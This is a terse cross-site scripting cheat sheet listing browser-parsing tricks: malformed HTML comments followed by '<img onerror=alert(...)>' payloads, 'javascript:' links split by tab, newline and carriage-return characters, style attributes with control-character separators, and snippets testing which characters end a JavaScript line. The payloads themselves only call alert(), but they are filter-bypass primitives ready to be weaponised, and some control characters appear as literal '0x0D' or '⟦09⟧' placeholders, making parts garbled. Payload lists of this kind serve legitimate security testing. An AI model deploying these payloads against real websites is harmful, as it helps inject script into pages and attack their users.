Cheat Sheet

<!--- ><xmp>--><img src/onerror=alert(45)>-->

<div style="font-family:'x
;color:red;';">test</div>

<div style="font-family:'x0x0C;color:red;';">test</div>

<div style="font-family:'x0x0D;color:red;';">test</div>

<div style="font-family:'x';color:red;';">test</div>

const c = String.fromCodePoint(i)0x0D
const c_lower = c.toLowerCase()0x0D
if (c_lower.length != c.length){0x0D
    alert(i)0x0D
}

<a id="0" href="j0x09avas0x09crip0x09t:window">craft-me</a>

<a id="0" href="j
avas
crip
t:window">craft-me</a>

<a id="0" href="j0x0Davas0x0Dcrip0x0Dt:window">craft-me</a>

// 
alert(10)

// 0x0Dalert(13)

// 
alert(8232)

// 
alert(8233)

<div style=0x09color:red⟦09⟧></div>

<div style=
color:red
></div>

<div style=0x0Ccolor:red⟦0C⟧></div>

<div style=0x0Dcolor:red⟦0D⟧></div>

<div style= color:red ></div>

<!----!><img/src/onerror=alert(1)>

<!-----><img/src/onerror=alert(1)>

<!---->><img/src/onerror=alert(1)>

""
alert(10)

""0x0Dalert(13)

""%alert(37)

""&alert(38)

""*alert(42)

alert(10)

sdfasdfasfasfd

alert(13)0x0D0x0Dsdfasdfasfasfd

alert(38)&&sdfasdfasfasfd

alert(42)**sdfasdfasfasfd

alert(47)//sdfasdfasfasfd

alert0x09(9)

alert
(10)

alert0x0B(11)

alert0x0C(12)

alert0x0D(13)

alert(9)⟦09⟧

alert(10)

alert(11)0x0B

alert(12)0x0C

alert(13)0x0D

console.alert()
alert(10)

console.alert()0x0Dalert(13)

console.alert()%alert(37)

console.alert()&alert(38)

console.alert()*alert(42)

<found0x09>

<found
>

<found0x0C>

<found0x0D>

<found >